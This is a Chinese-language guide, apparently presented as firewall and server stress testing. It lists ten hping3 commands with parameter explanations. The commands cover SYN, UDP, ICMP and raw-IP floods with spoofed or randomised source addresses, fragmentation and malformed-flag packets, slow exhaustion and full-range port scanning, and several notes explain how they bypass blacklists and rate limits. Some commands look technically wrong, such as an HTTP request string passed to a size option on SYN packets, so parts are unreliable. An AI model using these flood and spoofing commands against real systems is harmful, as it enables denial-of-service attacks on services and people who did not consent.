一、高强度 SYN 洪水(TCP 半连接攻击)

命令

sudo hping3 -S -p 80 --flood --rand-source -d 512 -w 128 -c 50000 目标IP

参数解析

  • -S:发送 SYN 包(模拟 TCP 握手请求)。
  • --flood:洪水模式(最大速率发包)。
  • --rand-source:随机伪造源 IP(绕过 IP 黑名单)。
  • -d 512:每个包携带 512 字节的随机数据。
  • -w 128:设置 TCP 窗口大小为 128 字节。
  • -c 50000:发送 50,000 个包后停止。
  • -p 80:目标为 HTTP 服务端口。

测试目的

  • 测试服务器处理海量半开连接(SYN_RECV 状态)的能力。
  • 验证防火墙是否能识别并拦截伪造源 IP 的洪水流量。

二、分片包攻击(绕过防火墙规则)

命令

sudo hping3 -S -p 443 --frag --more-frag -d 2048 --flood 目标IP

参数解析

  • --frag:启用数据包分片。
  • --more-frag:标记分片包为“更多分片”(模拟复杂分片攻击)。
  • -d 2048:每个包总大小 2048 字节(强制分片)。
  • -p 443:目标为 HTTPS 端口。

测试目的

  • 测试防火墙/IDS 能否正确重组分片包并检测恶意内容。
  • 验证服务器 TCP 栈处理异常分片的能力。

三、UDP 洪水攻击(模拟 DDoS 反射攻击)

命令

sudo hping3 --udp -p 53 --flood --rand-source -a 8.8.8.8 --data 200 目标IP

参数解析

  • --udp:使用 UDP 协议。
  • -p 53:目标为 DNS 服务端口(常见反射攻击源)。
  • -a 8.8.8.8:伪造源 IP 为 8.8.8.8(模拟 DNS 反射攻击)。
  • --data 200:每个包携带 200 字节数据(模拟 DNS 响应负载)。

测试目的

  • 测试防火墙能否识别伪造源 IP 的 UDP 流量。
  • 验证服务器对 UDP 泛洪的带宽和包处理能力。

四、混合标志位攻击(触发 IDS/IPS 规则)

命令

sudo hping3 -p 22 -S -F -A -U -P -R -c 1000 --flood 目标IP

参数解析

  • -S -F -A -U -P -R:同时设置 SYN、FIN、ACK、URG、PSH、RST 标志位(非法组合)。
  • -p 22:目标为 SSH 端口(高价值服务)。
  • -c 1000:发送 1000 个异常包。

测试目的

  • 测试 IDS/IPS 是否检测到异常 TCP 标志位组合。
  • 验证服务器对畸形包的处理逻辑(是否崩溃或丢弃)。

五、慢速攻击(Low & Slow 资源耗尽)

命令

hping3 -S -p 80 --keep -i u10000 --rand-source 目标IP

参数解析

  • --keep:持续发包直到手动停止(Ctrl+C)。
  • -i u10000:每 10 毫秒发送一个包(低速但持久)。
  • --rand-source:随机源 IP(绕过单 IP 速率限制)。

测试目的

  • 模拟慢速攻击,长期占用服务器连接资源。
  • 测试防火墙的慢连接检测和自动清理机制。

六、ICMP 洪水(模拟 Ping 泛洪)

命令

sudo hping3 --icmp --flood -d 1000 --rand-source 目标IP

参数解析

  • --icmp:发送 ICMP Echo 请求(类似 Ping)。
  • -d 1000:每个 ICMP 包携带 1000 字节数据(大包攻击)。
  • --flood:高速发包。

测试目的

  • 测试服务器对 ICMP 洪水的处理能力。
  • 验证防火墙是否限制 ICMP 流量速率。

七、精准 HTTP 层攻击(应用层压测)

命令

sudo hping3 -p 80 -S --data 500 --dport 80 --flood 目标IP --data "GET /heavy-resource HTTP/1.1\r\nHost: example.com\r\n\r\n"

参数解析

  • --data "GET ...":自定义 HTTP 请求(模拟访问高负载页面)。
  • -d 500:填充数据包总长度为 500 字节。

测试目的

  • 测试 Web 服务器处理大量 HTTP GET 请求的能力。
  • 验证 WAF 是否过滤恶意请求(需构造更复杂的 Payload)。

八、随机端口扫描 + 攻击组合

命令

sudo hping3 --rand-source -S --scan 1-65535 -p ++1 目标IP

参数解析

  • --scan 1-65535:扫描所有端口。
  • -p ++1:每次递增端口号。
  • --rand-source:随机源 IP(隐蔽扫描)。

测试目的

  • 测试防火墙是否屏蔽非常用端口的扫描行为。
  • 验证 IDS 对分布式端口扫描的检测能力。

九、IP 协议号混淆(非 TCP/UDP/ICMP)

命令

sudo hping3 --rawip -H 253 -p 80 --flood --rand-source 目标IP

参数解析

  • --rawip:使用原始 IP 协议(非 TCP/UDP)。
  • -H 253:设置 IP 协议号为 253(非常用协议号)。

测试目的

  • 测试防火墙对非标准协议流量的处理策略(允许/拦截)。
  • 验证服务器是否会因未知协议消耗 CPU 资源。

十、多向量组合攻击(复杂场景)

命令

sudo hping3 -S -p 80 --flood --rand-source --frag -d 1500 --ttl 128 -w 256 目标IP

参数解析

  • --ttl 128:设置数据包 TTL 为 128(模拟正常流量)。
  • -w 256:TCP 窗口大小设为 256 字节。
  • 组合使用分片(--frag)、随机源 IP 和洪水模式。

测试目的

  • 模拟复杂攻击(分片 + 随机源 + 大包),测试综合防护能力。
  • 验证防火墙策略是否能叠加生效(如分片重组 + IP 信誉库)。